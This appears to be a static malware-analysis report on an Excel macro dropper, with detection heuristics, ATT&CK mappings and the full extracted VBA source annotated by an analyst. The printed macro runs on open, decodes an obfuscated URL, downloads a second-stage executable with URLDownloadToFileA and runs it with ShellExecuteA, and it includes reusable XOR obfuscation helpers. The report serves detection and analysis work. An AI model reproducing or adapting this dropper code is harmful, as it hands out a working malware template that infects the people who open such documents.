Xls.Dropper.Agent-7623197-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 8be51b3f3be3eb45…

MALICIOUS

Office (OLE)

205.0 KB Created: 2014-05-06 06:56:25 Authoring application: Microsoft Excel First seen: 2015-09-16
MD5: 442e22b587e1daa9947e5479c14ac3f0 SHA-1: 6cb08c6eef2c7c7ccf5b8cc972add1c5833b3847 SHA-256: 8be51b3f3be3eb45d2cff9715a2d40fc04c11f25734ea8e7a3f551bcd2c216c8
268 Risk Score

Malware Insights

Xls.Dropper.Agent-7623197-0 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter T1105 Ingress Tool Transfer

The sample is an Excel document containing VBA macros that leverage the Workbook_Open event. A lure persuades the user to enable macros; once enabled, the macro calls URLDownloadToFile to fetch a second-stage payload and ShellExecute to run it. The ClamAV signature 'Xls.Dropper.Agent-7623197-0' further confirms its malicious nature as a dropper.

Heuristics 7

  • ClamAV: Xls.Dropper.Agent-7623197-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7623197-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    "URLDownloadToFileA" (ByVal zQCGhURLeby As Long, ByVal TsyuGJ As String, _
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4687 bytes
SHA-256: cb473a12779171032cbf35f9389d605d54dd5567e67418e86f116160ed6dfa6c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' ThisWorkbook is the document-level module: its Workbook_Open handler fires
' automatically when the file is opened with macros enabled. All of the
' dropper logic in this extracted script lives in this module.
' Welcome to my Macro Doc Program
' Thanks for Purchasing My Service
' I am not responsible for Your Any Action
' Please Use it at your Own Fucking Risk.
' Mahalam, Namaste
' Shellshock, BioShock
' WhattheFuck, IRock
' Bye Bye
#If VBA7 Then
' Win32 imports hidden behind random-looking function names. The junk names
' are obfuscation only: the Alias strings ("ShellExecuteA", "URLDownloadToFileA")
' and the library names ("shell32", "urlmon") are fixed by the API and are what
' static scanners key on — this is why an olevba/string scan still flags the file.
' shell32!ShellExecuteA — used below to launch the downloaded file.
Private Declare PtrSafe Function OKjHhGgHgHnGhUuGbGhBvGhhGbGhbGhv Lib "shell32" Alias _
"ShellExecuteA" (ByVal gjbzOHrZcwYerBW As Long, ByVal kXJlHGiPhSWxW As String, _
ByVal GHGhHbjgYuHbHhvBbBGbGHhJghGh As String, ByVal DDhGhgggGgHhHhHhHhHhHhH As String, ByVal uHE As String, ByVal nAZZBJWySxVnNoztLuQ As Long) As Long
' urlmon!URLDownloadToFileA — used below to fetch the remote payload to disk.
Private Declare PtrSafe Function OKKKOkkOKiUUYYYtYtYtyjJhKiOihHHhhHHjjjJJJnhhGGGGbgBgFFFgffGFgfGF Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal zQCGhURLeby As Long, ByVal TsyuGJ As String, _
ByVal XtvEOJnCUpIC As String, ByVal sXhhglV As Long, ByVal OVANMd As Long) As Long
#Else
' Identical pair of imports for pre-VBA7 (32-bit, no PtrSafe) Office hosts, so
' the macro runs on either bitness.
Private Declare Function OKjHhGgHgHnGhUuGbGhBvGhhGbGhbGhv Lib "shell32" Alias _
"ShellExecuteA" (ByVal gjbzOHrZcwYerBW As Long, ByVal kXJlHGiPhSWxW As String, _
ByVal GHGhHbjgYuHbHhvBbBGbGHhJghGh As String, ByVal DDhGhgggGgHhHhHhHhHhHhH As String, ByVal uHE As String, ByVal nAZZBJWySxVnNoztLuQ As Long) As Long
Private Declare Function OKKKOkkOKiUUYYYtYtYtyjJhKiOihHHhhHHjjjJJJnhhGGGGbgBgFFFgffGFgfGF Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal zQCGhURLeby As Long, ByVal TsyuGJ As String, _
ByVal XtvEOJnCUpIC As String, ByVal sXhhglV As Long, ByVal OVANMd As Long) As Long
#End If

' Dropper routine (the name is random junk). Called from Workbook_Open, so it
' runs as soon as the user enables macros. Sequence: build a local drop path,
' decode the download URL, fetch it with URLDownloadToFileA, launch it with
' ShellExecuteA. Neither API return value is checked.
Private Sub CCCCvvvvVvvvvvvBBBBBBBBbnnnnn()
Dim VVvVaVAVvVVAVVVvvvVVVvbbbbBHhHhhHHHh As String, FFFDDeeeeDDDssdDSWEWEddd As String, KUDDqqRbnOjNmEPEBvNKiRci As String, WEweSDsddSDdddSSDDDddddddDDD As String, LgWMblTTGtUrDRzQCGhU As String, RLebyTsyuGJXtvEOJnCUpICs As String
' Payload filename, obfuscated with Decrypt (reverse, then shift each char
' code down by one). Applying that to "fyf/msuDfjcT" gives "SbieCtrl.exe",
' the filename of a legitimate sandboxing tool's controller — presumably
' chosen so the dropped file looks benign in a process or file listing.
FFFDDeeeeDDDssdDSWEWEddd = Decrypt("fyf/msuDfjcT")
' Drop location is the shared Public Documents folder, writable by any
' interactive user, so the download needs no elevation. An Office process
' writing an executable under C:\Users\Public is a useful detection signal.
KUDDqqRbnOjNmEPEBvNKiRci = "C:\Users\Public\Documents" & "\" & FFFDDeeeeDDDssdDSWEWEddd
Dim UrlToDownloadAndExecute As String
' Encoded URL blob. Its layout follows from the slicing below: a leading "xxx"
' marker (selects XorC's decryption branch), the XOR-encoded URL, then an
' 11-character trailer whose last 4 characters are the XOR key. The trailing
' comment is a template hint left behind by the macro builder.
UrlToDownloadAndExecute = "xxx*672|on'%p76o!3)oqn().(3oy03  | toso$..$ &.70..!&payloadAABA" 'Put Your Encrypted URL Here
Dim EncKey As String
' Key = last 4 characters of the blob (FindMyCarKey is just Right(s, 4)).
EncKey = FindMyCarKey(UrlToDownloadAndExecute)
Dim SlicedURLz As String
' Strip the 11-character trailer (which carries the key) before decoding.
SlicedURLz = Mid(UrlToDownloadAndExecute, 1, Len(UrlToDownloadAndExecute) - 11)
' Decode the URL; XorC sees the "xxx" prefix and runs in decryption mode.
VVvVaVAVvVVAVVVvvvVVVvbbbbBHhHhhHHHh = XorC(SlicedURLz, EncKey)
' URLDownloadToFileA(pCaller = 0, szURL, szFileName, dwReserved = 0, lpfnCB = 0):
' download the decoded URL straight to the drop path. The HRESULT is ignored,
' so the next line runs even if the download failed.
OKKKOkkOKiUUYYYtYtYtyjJhKiOihHHhhHHjjjJJJnhhGGGGbgBgFFFgffGFgfGF 0, VVvVaVAVvVVAVVVvvvVVVvbbbbBHhHhhHHHh, KUDDqqRbnOjNmEPEBvNKiRci, 0, 0
' ShellExecuteA(hwnd = 0, "open", file, params = "", dir = NULL, SW_SHOWNORMAL):
' execute the dropped file. This is the second stage launching; the child
' process will have EXCEL.EXE as its parent, which is what EDR parent/child
' rules for Office-spawned executables look for.
OKjHhGgHgHnGhUuGbGhBvGhhGbGhbGhv 0, "open", KUDDqqRbnOjNmEPEBvNKiRci, "", vbNullString, vbNormalFocus
End Sub

' Auto-run entry point. Excel raises Workbook_Open when the document is opened
' with macros enabled, so the enable-content lure is the only user interaction
' the dropper needs; there is no further trigger or condition.
Private Sub Workbook_Open()
CCCCvvvvVvvvvvvBBBBBBBBbnnnnn
End Sub
' Decrypt: trivial string de-obfuscation. Reverses the input, then shifts every
' character code down by one (Chr(Asc(x) - 1)). Used once, to keep the payload
' filename out of a plain string scan. Parameters and return are untyped
' (Variant); enc is ByRef by default and is overwritten with its reversal.
Private Function Decrypt(enc)
    Dim x, i, tmp
    enc = StrReverse(enc)
    For i = 1 To Len(enc)
        x = Mid(enc, i, 1)
        tmp = tmp & Chr(Asc(x) - 1)
    Next
    Decrypt = tmp
End Function
' XorC: symmetric XOR obfuscation with a +/-1 nudge so the output never
' contains a NUL. Its indented style, Hungarian names and descriptive comments
' differ from the rest of the module, so it is likely a reused snippet rather
' than the author's own code.
'   Mode: a leading "xxx" on sData selects decryption (and is stripped);
'         otherwise the data is encrypted and "xxx" is prepended to the result.
'   Bytes: VBA copies a String into a Byte() as its internal 2-byte-per-char
'         Unicode form, hence the Step 2 loop — only the low byte of each
'         character is transformed, the high byte is left as-is.
'   Arithmetic: VBA True is -1 and False is 0, so
'         decrypt: out = (in - 1) Xor key     encrypt: out = (in Xor key) + 1
'   Key: the key's low bytes are cycled (wraps at UBound).
'   Errors: an empty string or key returns the literal text
'         "Invalid argument(s) used" in-band rather than raising an error.
Function XorC(ByVal sData As String, ByVal sKey As String) As String
    Dim l As Long, i As Long, byIn() As Byte, byOut() As Byte, byKey() As Byte
    Dim bEncOrDec As Boolean
     'confirm valid string and key input:
    If Len(sData) = 0 Or Len(sKey) = 0 Then XorC = "Invalid argument(s) used": Exit Function
     'check whether running encryption or decryption (flagged by presence of "xxx" at start of sData):
    If Left$(sData, 3) = "xxx" Then
        bEncOrDec = False 'decryption
        sData = Mid$(sData, 4)
    Else
        bEncOrDec = True 'encryption
    End If
     'assign strings to byte arrays (unicode)
    byIn = sData
    byOut = sData
    byKey = sKey
    l = LBound(byKey)
    ' Only even indices (low bytes of each UTF-16 code unit) are rewritten.
    For i = LBound(byIn) To UBound(byIn) - 1 Step 2
        byOut(i) = ((byIn(i) + Not bEncOrDec) Xor byKey(l)) - bEncOrDec 'avoid Chr$(0) by using bEncOrDec flag
        l = l + 2
        If l > UBound(byKey) Then l = LBound(byKey) 'ensure stay within bounds of Key
    Next i
    ' Byte() back to String reinterprets the buffer as Unicode text.
    XorC = byOut
    If bEncOrDec Then XorC = "xxx" & XorC 'add "xxx" onto encrypted text
End Function
' FindMyCarKey: returns the last 4 characters of the encoded blob, which the
' builder appends as the XOR key. Key and ciphertext travel together in the
' same string, so the "encryption" provides no secrecy — only evasion of
' string-based scanners. Return is untyped (Variant holding a String).
Function FindMyCarKey(ByVal MyMangaledCodes As String)
Dim PlayMaker As String
PlayMaker = Right(MyMangaledCodes, 4)
FindMyCarKey = PlayMaker
End Function




Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Sheet1 module: attributes only, no code. The sheet itself presumably carries
' the visible enable-macros lure; all executable logic is in ThisWorkbook.